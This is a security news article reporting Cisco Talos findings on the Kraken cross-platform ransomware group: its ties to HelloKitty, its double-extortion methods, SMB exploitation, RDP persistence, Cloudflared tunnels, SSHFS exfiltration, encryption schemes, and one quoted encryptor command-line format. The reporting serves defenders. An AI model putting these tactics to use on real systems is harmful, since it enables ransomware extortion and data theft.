In August 2025, a new ransomware threat emerged with capabilities that fundamentally changed how organizations should approach enterprise security.
Kraken, a Russian-speaking cybercriminal group, began executing sophisticated attacks targeting large organizations across multiple continents.
What makes Kraken particularly dangerous is its ability to attack Windows, Linux, and VMware ESXi systems with platform-specific tools, making it one of the first truly cross-platform ransomware threats to gain widespread notoriety in enterprise circles.
The Kraken group appears to be connected to the HelloKitty ransomware operation, with security researchers suspecting the group emerged from the remnants of that previous criminal organization.
.webp "Kraken Cross-Platform Ransomware Attacking Windows, Linux, and VMware ESXi Systems in Enterprise Environments 2")
This connection becomes evident through shared ransom note filenames and explicit references on the group’s leak site.
.webp "Kraken Cross-Platform Ransomware Attacking Windows, Linux, and VMware ESXi Systems in Enterprise Environments 3")
In September 2025, Kraken announced a new underground forum called “The Last Haven Board,” designed to create a secure communication hub for the cybercriminal community.
Notably, HelloKitty operators announced their support for this new platform, solidifying the link between these groups.
Cisco Talos security analysts identified Kraken conducting double-extortion attacks in which victims are both encrypted and threatened with data publication.
The group employs a sophisticated multi-stage attack methodology that begins with SMB vulnerability exploitation on internet-exposed servers.
.webp "Kraken Cross-Platform Ransomware Attacking Windows, Linux, and VMware ESXi Systems in Enterprise Environments 5")
Once inside a system, attackers steal privileged credentials and use them to maintain persistent access through Remote Desktop Protocol connections.
To establish long-term presence, attackers deploy Cloudflared for creating reverse tunnels and SSH Filesystem tools for data exfiltration.
Before deploying encryption, the ransomware performs a unique benchmarking operation to measure how fast it can operate on the victim’s machine without causing immediate detection through system resource exhaustion.
Encryption and Command-Line Flexibility
Kraken’s technical sophistication becomes apparent through its extensive command-line options. The ransomware uses RSA-4096 and ChaCha20 encryption algorithms, providing strong cryptographic protection.
Attackers can customize attacks using parameters like timeout delays, file size limits, and encryption depth selections.
For Windows systems, the command format follows: Encryptor.exe –key <32-byte key> -path .
Linux and ESXi versions use ELF binaries with options like daemon mode execution and SSH remote capabilities.
The ransomware features partial and full encryption modes, allowing attackers to optimize between encryption speed and maximum damage.
Notably, Kraken actively encrypts SQL databases and network shares while automatically skipping critical system files and Program Files directories to maintain victim system functionality for ransom negotiations.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
